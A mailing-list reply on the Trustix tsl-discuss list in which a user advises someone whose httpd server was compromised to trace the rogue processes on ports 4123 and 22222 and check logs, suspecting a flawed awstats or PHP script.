Barbara M. wrote: > A friends that have an httpd server based on TSL 2.2 have received this > mail: > > ------------------------------------------- > Subject: Your_host_have_been_attacked > > Your host have been attacked by pv script. Look on netstat -anp for > process listen on 4123 port > > ------------------------------------------- > > It tell me that there is a process listing on port 4123 and another on > 22222. Stopping httpd and killing the process that own the daemons seems > temporarily "solve" the problem. > He did that process are owned by httpd.
the actual script running on those ports would have been helpful... > It is now busy in rebuilding a new box where to migrate data, so request > me to collect info on the "pv script". > Any hints? only to disect the process.. what file is it? who owns it? (likely httpd) then dig into logs to find what injected the script my guess, there is some common cgi-bin/php script on the box with a well known security flaw.. I see tons of requests for awstats, blog and whatnot in my error_log each day.. I in fact had a compromise by ways of an old awstats about a year ago... but the installed script didn't have much armroom, and was just installed to /var/tmp and run as httpd -- Morten _______________________________________________ tsl-discuss mailing list [email protected] http://lists.trustix.org/mailman/listinfo/tsl-discuss
